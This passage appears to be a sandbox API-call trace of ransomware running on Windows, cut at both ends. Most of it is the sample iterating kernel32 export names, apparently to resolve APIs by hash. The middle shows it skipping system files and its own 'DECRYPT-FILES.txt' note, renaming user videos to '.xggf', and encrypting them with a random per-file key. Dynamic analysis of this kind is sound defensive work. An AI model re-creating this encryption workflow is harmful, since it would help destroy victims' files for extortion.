(lpString="CREATETHREADPOOLWAIT") returned 20 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.650] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.650] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.650] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.650] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.651] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.651] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.651] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.651] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.651] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.651] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.651] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.651] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.651] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.651] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.651] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.651] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.651] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.651] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.651] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.651] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.651] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.651] lstrlenA (lpString="DELETEATOM") returned 10 [0087.651] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.652] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.652] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.652] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.652] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.652] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.652] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.652] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.652] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.652] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.652] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.652] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.652] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.652] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.652] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.652] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.652] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.652] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.652] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.652] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.652] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.653] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.653] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.653] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.653] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.653] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.653] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.653] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.653] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.653] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.653] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.653] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.653] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.653] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.653] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.653] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.653] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.654] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.654] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.654] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.654] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.654] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.654] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.654] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.654] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4") returned 64 [0087.654] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4.xggf") returned 69 [0087.654] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ws2pnj.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\WS2pNj.mp4.xggf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\ws2pnj.mp4.xggf"), dwFlags=0x0) returned 1 [0087.655] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.655] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.655] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.655] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x330b9a10, ftCreationTime.dwHighDateTime=0x1d4c80f, ftLastAccessTime.dwLowDateTime=0x6199a210, ftLastAccessTime.dwHighDateTime=0x1d4c5e8, ftLastWriteTime.dwLowDateTime=0x6199a210, ftLastWriteTime.dwHighDateTime=0x1d4c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x6d1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="xgEKJiGuAv6jN.flv", cAlternateFileName="XGEKJI~1.FLV")) returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="DECRYPT-FILES.txt") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="autorun.inf") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="boot.ini") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="desktop.ini") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="ntuser.dat") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="iconcache.db") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="bootsect.bak") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="ntuser.dat.log") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="thumbs.db") returned 1 [0087.656] lstrcmpiW (lpString1="xgEKJiGuAv6jN.flv", lpString2="Bootfont.bin") returned 1 [0087.656] lstrlenW (lpString="xgEKJiGuAv6jN.flv") returned 17 [0087.656] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.656] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.656] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.656] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.656] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.656] lstrlenW (lpString="xgEKJiGuAv6jN.flv") returned 17 [0087.656] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.656] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="xgEKJiGuAv6jN.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv" [0087.656] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\xgEKJiGuAv6jN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\xgekjiguav6jn.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.656] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=27934) returned 1 [0087.656] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.657] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.657] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.657] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.657] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.657] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.657] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.658] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.658] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.659] CloseHandle (hObject=0x42c) returned 1 [0087.659] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.659] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.659] CloseHandle (hObject=0x0) returned 0 [0087.659] CloseHandle (hObject=0x428) returned 1 [0087.659] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.660] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.660] GetTickCount () returned 0x114e5be [0087.660] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.660] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.660] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.660] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.661] lstrlenA (lpString="kernel32.dll") returned 12 [0087.661] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.661] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.661] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.661] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.661] lstrlenA (lpString="ADDATOMA") returned 8 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.661] lstrlenA (lpString="ADDATOMW") returned 8 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.661] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.661] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.661] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.661] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.661] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.661] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.661] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.662] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.662] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.662] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.662] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.662] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.662] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.662] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.662] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.662] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.662] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.662] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.662] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.662] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.662] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.662] lstrcpyA (in: 